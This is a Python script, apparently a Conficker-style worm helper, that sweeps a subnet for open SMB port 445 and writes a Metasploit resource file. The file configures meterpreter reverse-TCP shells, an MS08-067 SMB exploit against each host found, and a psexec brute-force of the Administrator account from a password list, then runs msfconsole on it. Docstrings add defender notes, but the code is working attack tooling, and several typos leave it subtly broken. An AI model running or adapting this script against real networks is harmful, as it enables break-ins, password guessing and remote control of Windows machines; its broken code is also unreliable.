# coding=UTF-8
import os
import optparse
import sys
import nmap
def findTgts(subNet):
    """Return the hosts in *subNet* that nmap reports with TCP port 445 open.

    Runs one nmap scan limited to port 445 over the given range, prints a
    line for every host whose port state is 'open', and returns those hosts
    as a list in the order nmap lists them.

    Defender's view: the network footprint is a single-port sweep of TCP/445
    across the range, which is the pattern SMB port-sweep detections in flow
    or IDS data key on.
    """
    scanner = nmap.PortScanner()
    scanner.scan(subNet, '445')
    open_hosts = []
    for addr in scanner.all_hosts():
        # Skip hosts for which nmap recorded no TCP/445 result at all.
        if not scanner[addr].has_tcp(445):
            continue
        # Only the 'open' state counts; any other state is ignored.
        if scanner[addr]['tcp'][445]['state'] != 'open':
            continue
        print('[+] Found Target Host:' + addr)
        open_hosts.append(addr)
    return open_hosts
def setupHandler(configFile, lhost, lport):
    """Append the listener section of the resource script to *configFile*.

    Writes six lines through ``configFile.write``: the handler module
    selection, the payload, the LPORT and LHOST settings, the job launch, and
    a global ``DisablePayloadHandler`` setting. ``lport`` is passed through
    ``str()``; ``lhost`` must already be a string. Both values are appended
    to the option keyword by plain string concatenation, exactly as given.
    """
    def _listener_lines():
        # Lazy generator: each line is built immediately before it is
        # written, so the order of evaluation matches a sequence of writes.
        yield 'use exploit/multi/handler\n'
        yield 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
        yield 'set LPORT' + str(lport) + '\n'
        yield 'set LHOST' + lhost + '\n'
        yield 'exploit -j -z\n'
        yield 'setg DisablePayloadHandler 1\n'

    for line in _listener_lines():
        configFile.write(line)
def confickerExploit(configFile, tgtHost, lhost, lport):
    """Append one per-host SMB exploit section to *configFile*.

    Writes six lines through ``configFile.write``: a module selection under
    ``exploit/windows/smb/``, the RHOST, PAYLOAD, LPORT and LHOST settings,
    and a job launch. ``tgtHost`` and ``lport`` go through ``str()``;
    ``lhost`` must already be a string. Every literal is emitted exactly as
    it appears in the listing, with values concatenated directly onto the
    option keyword.

    Defender's view: the section targets the SMB service on TCP/445 of
    ``tgtHost``, so patch level of the Windows SMB/Server service and
    filtering of inbound 445 are the controls that matter here.
    """
    def _exploit_lines():
        # Lazy generator: each line is built immediately before it is
        # written, so the order of evaluation matches a sequence of writes.
        yield 'use exploit/windows/smb/sms08_067_netapi\n'
        yield 'set RHOST' + str(tgtHost) + '\n'
        yield 'set PAYLOAD windows/meterpreter/revserse_tcp\n'
        yield 'set LPORT' + str(lport) + '\n'
        yield 'set LHOST' + lhost + '\n'
        yield 'exploit -j -z\n'

    for line in _exploit_lines():
        configFile.write(line)
def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
    """Append one psexec section per password-file line to *configFile*.

    The code is reproduced exactly as listed; only comments were added.

    configFile -- object with a ``write`` method receiving the script text
    tgtHost    -- value written after ``set RHOST`` (passed through str())
    passwdFile -- path opened for reading, one candidate password per line
    lhost      -- string written after ``set LHOST``
    lport      -- value written after ``set LPORT`` (passed through str())

    Defender's view: every section is one SMB authentication as the fixed
    account name below, so a run would presumably show up on the target as a
    burst of logon attempts for one account from one source address. Failed
    logon auditing (Windows event 4625) and an account-lockout policy are the
    relevant controls.
    """
    # The account name is hard-coded; only the password varies per section.
    username = 'Administrator'
    # The handle is never closed in this block; it stays open until the
    # interpreter reclaims it.
    pF = open(passwdFile,'r')
    # readlines() loads the whole password file into memory at once.
    for password in pF.readlines();
        # Drop trailing newline and carriage-return characters only; other
        # whitespace in the line is kept as part of the password.
        password = password.strip('\n').strip('\r')
        configFile.write('use exploit/windows/smb/psexec\n')
        configFile.write('set SMBUser ' + str(username) + '\n')
        # The candidate password is written in clear text into the script
        # file, which therefore holds the full wordlist after a run.
        configFile.write('set SMBPass ' + str(password) + '\n')
        configFile.write('set RHOST ' + str(tgtHost) + '\n')
        configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
        configFile.write('set LPORT ' + str(lport) + '\n')
        configFile.write('set LHOST ' + lhost + '\n')
        configFile.write('exploit -j -z\n')
def main():
    """Build meta.rc from the command-line options and pass it to msfconsole.

    The code is reproduced exactly as listed; only comments were added.

    Flow as written: open meta.rc for writing, read the -H/-l/-p/-F options,
    scan the -H range with findTgts, write the listener section once, write
    one exploit section per host found (plus the password-list sections when
    -F is given), close the file, then start msfconsole on it.

    Host artefacts visible in the code: a file named meta.rc in the current
    working directory and an msfconsole child process started through the
    shell. Both are usable as process-creation and file-creation indicators.
    """
    # Opened (and truncated) relative to the working directory before the
    # options are checked, so the early exit below still leaves an empty file.
    configFile = open('meta.rc','w')
    parser = optparse.OptionParser('[-] Usage%prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
    parser.add_option('-H',dest='tgtHost',type='string',help='specify the target address[es]')
    parser.add_option('-p',dest='lport',type='string',help='specify the listen port')
    parser.add_option('-l',dest='lhost',type='string',help='specify the listen address')
    parser.add_option('-F',dest='passwdFile',type='string',help='password file for SMB brute force attempt')
    # Method name kept as spelled in the listing.
    (options,args) = parser.pasre_args()
    # '|' is applied to two booleans here, so it acts as a non-short-circuit
    # "or": both -H and -l are required.
    if(options.tgtHost == None)|(options.lhost == None):
        print(parser.usage)
        # Exits with status 0 even though required options are missing.
        exit(0)
    lhost = options.lhost
    lport = options.lport
    # Listen port falls back to the string '1337' when -p is not given.
    if lport == None:
        lport = '1337'
    passwdFile = options.passwdFile
    # The -H value is handed to the scanner unchanged; only hosts it returns
    # are written into the script.
    tgtHosts = findTgts(options.tgtHost)
    setupHandler(configFile,lhost,lport)
    for tgtHost in tgtHosts:
        confickerExploit(configFile,tgtHost,lhost,lport)
        # Password-list sections are added only when -F was supplied.
        if passwdFile != None:
            smbBrute(configFile,tgtHost,passwdFile,lhost,lport)
    configFile.close()
    # Fixed command string: no option value reaches the shell command line;
    # option values only reach msfconsole through the contents of meta.rc.
    os.system('msfconsole -r meta.rc')
# Script entry point: main() runs only on direct execution, not on import.
if "__main__" == __name__:
    main()